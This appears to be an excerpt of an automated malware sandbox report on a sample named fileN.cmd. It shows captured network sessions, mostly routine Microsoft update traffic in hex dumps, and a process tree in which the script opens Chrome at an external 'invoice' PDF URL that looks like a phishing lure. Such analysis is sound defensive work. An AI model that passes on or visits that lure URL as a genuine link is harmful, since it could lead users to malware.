                                                  2024-05-23 19:06:51 UTC164INHTTP/1.1 404 Not Found
                                                  Date: Thu, 23 May 2024 19:06:51 GMT
                                                  Server: Apache
                                                  Content-Length: 315
                                                  Connection: close
                                                  Content-Type: text/html; charset=iso-8859-1
                                                  2024-05-23 19:06:51 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  3192.168.2.649711184.28.90.27443
                                                  TimestampBytes transferredDirectionData
                                                  2024-05-23 19:06:55 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept: */*
                                                  Accept-Encoding: identity
                                                  User-Agent: Microsoft BITS/7.8
                                                  Host: fs.microsoft.com
                                                  2024-05-23 19:06:55 UTC467INHTTP/1.1 200 OK
                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                  Content-Type: application/octet-stream
                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                  Server: ECAcc (chd/079C)
                                                  X-CID: 11
                                                  X-Ms-ApiVersion: Distribute 1.2
                                                  X-Ms-Region: prod-eus2-z1
                                                  Cache-Control: public, max-age=43020
                                                  Date: Thu, 23 May 2024 19:06:55 GMT
                                                  Connection: close
                                                  X-CID: 2


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  4192.168.2.649712184.28.90.27443
                                                  TimestampBytes transferredDirectionData
                                                  2024-05-23 19:06:56 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept: */*
                                                  Accept-Encoding: identity
                                                  If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                  Range: bytes=0-2147483646
                                                  User-Agent: Microsoft BITS/7.8
                                                  Host: fs.microsoft.com
                                                  2024-05-23 19:06:56 UTC514INHTTP/1.1 200 OK
                                                  ApiVersion: Distribute 1.1
                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                  Content-Type: application/octet-stream
                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                  Server: ECAcc (lpl/EF06)
                                                  X-CID: 11
                                                  X-Ms-ApiVersion: Distribute 1.2
                                                  X-Ms-Region: prod-weu-z1
                                                  Cache-Control: public, max-age=42972
                                                  Date: Thu, 23 May 2024 19:06:56 GMT
                                                  Content-Length: 55
                                                  Connection: close
                                                  X-CID: 2
                                                  2024-05-23 19:06:56 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                  Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  5192.168.2.64971420.114.59.183443
                                                  TimestampBytes transferredDirectionData
                                                  2024-05-23 19:07:07 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=xDvV1b4DS8yY7Hh&MD=9xpw3R+4 HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept: */*
                                                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                  Host: slscr.update.microsoft.com
                                                  2024-05-23 19:07:07 UTC560INHTTP/1.1 200 OK
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  Content-Type: application/octet-stream
                                                  Expires: -1
                                                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                  ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                  MS-CorrelationId: 91b98085-d229-4db3-856a-2547d7293141
                                                  MS-RequestId: 98a51b7f-4dfc-4019-9bd6-b156abebf7f7
                                                  MS-CV: whSJKXyd60WLhO9L.0
                                                  X-Microsoft-SLSClientCache: 2880
                                                  Content-Disposition: attachment; filename=environment.cab
                                                  X-Content-Type-Options: nosniff
                                                  Date: Thu, 23 May 2024 19:07:07 GMT
                                                  Connection: close
                                                  Content-Length: 24490
                                                  2024-05-23 19:07:07 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                  Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                  2024-05-23 19:07:07 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                  Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  6192.168.2.64972020.114.59.183443
                                                  TimestampBytes transferredDirectionData
                                                  2024-05-23 19:07:45 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=xDvV1b4DS8yY7Hh&MD=9xpw3R+4 HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept: */*
                                                  User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                  Host: slscr.update.microsoft.com
                                                  2024-05-23 19:07:46 UTC560INHTTP/1.1 200 OK
                                                  Cache-Control: no-cache
                                                  Pragma: no-cache
                                                  Content-Type: application/octet-stream
                                                  Expires: -1
                                                  Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                  ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_1440"
                                                  MS-CorrelationId: 1734a868-e9fd-4cca-b389-3229b2858f23
                                                  MS-RequestId: bbf077d7-c570-4b0b-8574-2c0d29807385
                                                  MS-CV: RW0Ye8B7YEOrzIT4.0
                                                  X-Microsoft-SLSClientCache: 1440
                                                  Content-Disposition: attachment; filename=environment.cab
                                                  X-Content-Type-Options: nosniff
                                                  Date: Thu, 23 May 2024 19:07:45 GMT
                                                  Connection: close
                                                  Content-Length: 25457
                                                  2024-05-23 19:07:46 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92
                                                  Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
                                                  2024-05-23 19:07:46 UTC9633INData Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a
                                                  Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:15:06:46
                                                  Start date:23/05/2024
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\fileN.cmd" "
                                                  Imagebase:0x7ff6d96c0000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:1
                                                  Start time:15:06:46
                                                  Start date:23/05/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff66e660000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:15:06:47
                                                  Start date:23/05/2024
                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://s2r.tn/cgi/INVOICERVSHA.pdf
                                                  Imagebase:0x7ff684c40000
                                                  File size:3'242'272 bytes
                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:6
                                                  Start time:15:06:48
                                                  Start date:23/05/2024
                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=2016,i,2758172289711227357,3117054335507487613,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                  Imagebase:0x7ff684c40000
                                                  File size:3'242'272 bytes
                                                  MD5 hash:5BBFA6CBDF4C254EB368D534F9E23C92
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false

                                                  No disassembly